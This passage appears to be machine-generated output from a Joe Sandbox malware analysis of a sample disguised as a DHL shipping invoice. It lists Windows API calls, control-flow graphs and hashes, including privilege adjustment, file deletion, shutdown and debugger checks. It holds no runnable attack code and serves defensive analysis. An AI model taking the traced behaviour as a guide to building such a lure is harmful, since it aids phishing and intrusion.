                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(00442800,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                                      • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                      • API String ID: 3441113951-3195845224
                                                                                                                                                                                                                                      • Opcode ID: 22b8795af144aae1d525309f94cca5ba9a4a3f263f85987c0d75d6683015679d
                                                                                                                                                                                                                                      • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22b8795af144aae1d525309f94cca5ba9a4a3f263f85987c0d75d6683015679d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 253 404c9e-404cea GetDlgItem * 2 254 404cf0-404d84 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 253->254 255 404f0b-404f12 253->255 256 404d93-404d9a DeleteObject 254->256 257 404d86-404d91 SendMessageW 254->257 258 404f14-404f24 255->258 259 404f26 255->259 261 404d9c-404da4 256->261 257->256 260 404f29-404f32 258->260 259->260 262 404f34-404f37 260->262 263 404f3d-404f43 260->263 264 404da6-404da9 261->264 265 404dcd-404dd1 261->265 262->263 266 405021-405028 262->266 269 404f52-404f59 263->269 270 404f45-404f4c 263->270 267 404dab 264->267 268 404dae-404dcb call 4062dc SendMessageW * 2 264->268 265->261 271 404dd3-404dff call 404231 * 2 265->271 276 405099-4050a1 266->276 277 40502a-405030 266->277 267->268 268->265 273 404f5b-404f5e 269->273 274 404fce-404fd1 269->274 270->266 270->269 310 404e05-404e0b 271->310 311 404eca-404edd GetWindowLongW SetWindowLongW 271->311 282 404f60-404f67 273->282 283 404f69-404f7e call 404bec 273->283 274->266 278 404fd3-404fdd 274->278 280 4050a3-4050a9 SendMessageW 276->280 281 4050ab-4050b2 276->281 285 405281-405293 call 404298 277->285 286 405036-405040 277->286 288 404fed-404ff7 278->288 289 404fdf-404feb SendMessageW 278->289 280->281 290 4050b4-4050bb 281->290 291 4050e6-4050ed 281->291 282->274 282->283 283->274 309 404f80-404f91 283->309 286->285 294 405046-405055 SendMessageW 286->294 288->266 296 404ff9-405003 288->296 289->288 297 4050c4-4050cb 290->297 298 4050bd-4050be ImageList_Destroy 290->298 301 405243-40524a 291->301 302 4050f3-4050ff call 4011ef 291->302 294->285 303 40505b-40506c SendMessageW 294->303 305 405014-40501e 296->305 306 405005-405012 296->306 307 4050d4-4050e0 297->307 308 4050cd-4050ce GlobalFree 297->308 298->297 301->285 304 40524c-405253 301->304 328 405101-405104 302->328 329 40510f-405112 302->329 313 405076-405078 303->313 314 40506e-405074 303->314 304->285 316 405255-40527f ShowWindow GetDlgItem ShowWindow 304->316 305->266 306->266 307->291 308->307 309->274 318 404f93-404f95 309->318 319 404e0e-404e15 310->319 317 404ee3-404ee7 311->317 315 405079-405092 call 401299 SendMessageW 313->315 314->313 314->315 315->276 316->285 322 404f01-404f09 call 404266 317->322 323 404ee9-404efc ShowWindow call 404266 317->323 324 404f97-404f9e 318->324 325 404fa8 318->325 326 404eab-404ebe 319->326 327 404e1b-404e43 319->327 322->255 323->285 338 404fa0-404fa2 324->338 339 404fa4-404fa6 324->339 342 404fab-404fc7 call 40117d 325->342 326->319 333 404ec4-404ec8 326->333 340 404e45-404e7b SendMessageW 327->340 341 404e7d-404e7f 327->341 330 405106 328->330 331 405107-40510a call 404c6c 328->331 334 405153-405177 call 4011ef 329->334 335 405114-40512d call 4012e2 call 401299 329->335 330->331 331->329 333->311 333->317 355 405219-40522d InvalidateRect 334->355 356 40517d 334->356 360 40513d-40514c SendMessageW 335->360 361 40512f-405135 335->361 338->342 339->342 340->326 343 404e81-404e90 SendMessageW 341->343 344 404e92-404ea8 SendMessageW 341->344 342->274 343->326 344->326 355->301 359 40522f-40523e call 404bbf call 404ba7 355->359 357 405180-40518b 356->357 362 405201-405213 357->362 363 40518d-40519c 357->363 359->301 360->334 367 405137 361->367 368 405138-40513b 361->368 362->355 362->357 365 40519e-4051ab 363->365 366 4051af-4051b2 363->366 365->366 370 4051b4-4051b7 366->370 371 4051b9-4051c2 366->371 367->368 368->360 368->361 373 4051c7-4051ff SendMessageW * 2 370->373 371->373 374 4051c4 371->374 373->362 374->373
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                                                                                                      • Opcode ID: 38e67d642b103c863e09d225da822fb6d69acbe0d816e4b8de2aebeebed4de2d
                                                                                                                                                                                                                                      • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38e67d642b103c863e09d225da822fb6d69acbe0d816e4b8de2aebeebed4de2d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,00441800,757C3420,00000000), ref: 004059F5
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,00441800,757C3420,00000000), ref: 00405A3D
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,00441800,757C3420,00000000), ref: 00405A60
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,00441800,757C3420,00000000), ref: 00405A66
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,00441800,757C3420,00000000), ref: 00405A76
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 2035342205-1173974218
                                                                                                                                                                                                                                      • Opcode ID: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                                                                                                                                                                                                                      • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 34652645
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 34652710
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 34652730
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 3465273A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                                      • Opcode ID: 5105bcb24d0e014d7eacef41bd29a585bb23e41465c4a9d497af0b2c3cbd9293
                                                                                                                                                                                                                                      • Instruction ID: 0e018fdf4275747f124ab1e46a2576fae0191e7e9bb19f80995eb3396eca6e81
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5105bcb24d0e014d7eacef41bd29a585bb23e41465c4a9d497af0b2c3cbd9293
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2312B75D45218DFEB10DF64D9897CDBBB8AF08300F1040DAE40DA7250EB705A858F45
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 34652276
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 34652285
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 3465228E
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 3465229B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                      • Opcode ID: f6c3e7aa074190e89c54f30d9273a2e0560cdc42ffefc71e367fc32317beb651
                                                                                                                                                                                                                                      • Instruction ID: 6d37c550c63b1bf4cd25b64fb29d45494720243deff5c60da0d419c5fa1e9448
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6c3e7aa074190e89c54f30d9273a2e0560cdc42ffefc71e367fc32317beb651
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75F05A71C10209EBCB00DFB4D689A9EBBF8FF18315FA188959412F7181E778AB069B55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,34652C3B,3465D1DC,00000017), ref: 34652B21
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(3465D1DC,?,34652C3B,3465D1DC,00000017), ref: 34652B2A
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,34652C3B,3465D1DC,00000017), ref: 34652B35
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,34652C3B,3465D1DC,00000017), ref: 34652B3C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                                                      • Opcode ID: ccd013cdf870d816249045ca8509c87c9b8c722fe9aff4944b5bc3ec4c805773
                                                                                                                                                                                                                                      • Instruction ID: 4b5542d7d9d94a83c0c60de0dc6341eef359df0f24fc921e7f8f985d9cd06055
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccd013cdf870d816249045ca8509c87c9b8c722fe9aff4944b5bc3ec4c805773
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BD00271044204BBD7406FE1ED0DA5D3F2CEB04656F048490F70AA64D2DB759497CB59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 346561DA
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 346561E4
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 346561F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                      • Opcode ID: 9b24e8ecefd96841428af93be394e6cd68c51cad3428f0967dc1e017d54b3553
                                                                                                                                                                                                                                      • Instruction ID: 5b03741d6a41027fea79baf7327dd536e0f886bddfabaf201d99b865bea7e10b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b24e8ecefd96841428af93be394e6cd68c51cad3428f0967dc1e017d54b3553
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6031B37490121CABDB61DF64D98878DBBB8EF18310F5041DAE81CA7261E7349B85CF49
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,34654A8A,?,34662238,0000000C,34654BBD,00000000,00000000,00000001,34652082,34662108,0000000C,34651F3A,?), ref: 34654AD5
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,34654A8A,?,34662238,0000000C,34654BBD,00000000,00000000,00000001,34652082,34662108,0000000C,34651F3A,?), ref: 34654ADC
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 34654AEE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      • Opcode ID: 5f176060f510d310b352290dea8575009ee5c875c7f3fe8828401964dfcd173f
                                                                                                                                                                                                                                      • Instruction ID: 212eef58fb24faaab7f1b71c380e34d5fdee50a489605e987c9bffaa35e3afbc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f176060f510d310b352290dea8575009ee5c875c7f3fe8828401964dfcd173f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27E0B636000209EFDF41AF65DD48B493B6AEF40391B5080D4F9099B172DB35D993CA59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 3465294C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                                                      • Opcode ID: e52eb94ebc927a595c2a8c1d6caf1836a1e30acb3f05954e24c1b8a2c4c6b700
                                                                                                                                                                                                                                      • Instruction ID: 25cb48ba2a1383be5440030e9a29657579000851f5ed1e4c7298677347bfee2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e52eb94ebc927a595c2a8c1d6caf1836a1e30acb3f05954e24c1b8a2c4c6b700
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8419DB1901204EBEB10CF95C58169EBBF4FB88314F1485AEE40AFB364D3789A85CF61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                                      • Opcode ID: 2eb178a7b699766ca4b5271b1e4861752172bd1aa918ded5c59fc9d319722f75
                                                                                                                                                                                                                                      • Instruction ID: 9d0e0362c4fd4ddff065ab1e0be9fc126f0c163b593bbebc88d1ac531451266a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2eb178a7b699766ca4b5271b1e4861752172bd1aa918ded5c59fc9d319722f75
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1A00170601203EF97948E35960A20D3AADEA85691B1581A9A909E5195EB7884929A0D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 202 405461-40547c 203 405482-405549 GetDlgItem * 3 call 404266 call 404bbf GetClientRect GetSystemMetrics SendMessageW * 2 202->203 204 40560b-405612 202->204 222 405567-40556a 203->222 223 40554b-405565 SendMessageW * 2 203->223 206 405614-405636 GetDlgItem CreateThread CloseHandle 204->206 207 40563c-405649 204->207 206->207 208 405667-405671 207->208 209 40564b-405651 207->209 213 405673-405679 208->213 214 4056c7-4056cb 208->214 211 405653-405662 ShowWindow * 2 call 404266 209->211 212 40568c-405695 call 404298 209->212 211->208 226 40569a-40569e 212->226 219 4056a1-4056b1 ShowWindow 213->219 220 40567b-405687 call 40420a 213->220 214->212 217 4056cd-4056d3 214->217 217->212 224 4056d5-4056e8 SendMessageW 217->224 227 4056c1-4056c2 call 40420a 219->227 228 4056b3-4056bc call 405322 219->228 220->212 229 40557a-405591 call 404231 222->229 230 40556c-405578 SendMessageW 222->230 223->222 231 4057ea-4057ec 224->231 232 4056ee-405719 CreatePopupMenu call 4062dc AppendMenuW 224->232 227->214 228->227 241 405593-4055a7 ShowWindow 229->241 242 4055c7-4055e8 GetDlgItem SendMessageW 229->242 230->229 231->226 239 40571b-40572b GetWindowRect 232->239 240 40572e-405743 TrackPopupMenu 232->240 239->240 240->231 243 405749-405760 240->243 244 4055b6 241->244 245 4055a9-4055b4 ShowWindow 241->245 242->231 246 4055ee-405606 SendMessageW * 2 242->246 247 405765-405780 SendMessageW 243->247 248 4055bc-4055c2 call 404266 244->248 245->248 246->231 247->247 249 405782-4057a5 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 247->249 248->242 251 4057a7-4057ce SendMessageW 249->251 251->251 252 4057d0-4057e4 GlobalUnlock SetClipboardData CloseClipboard 251->252 252->231
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
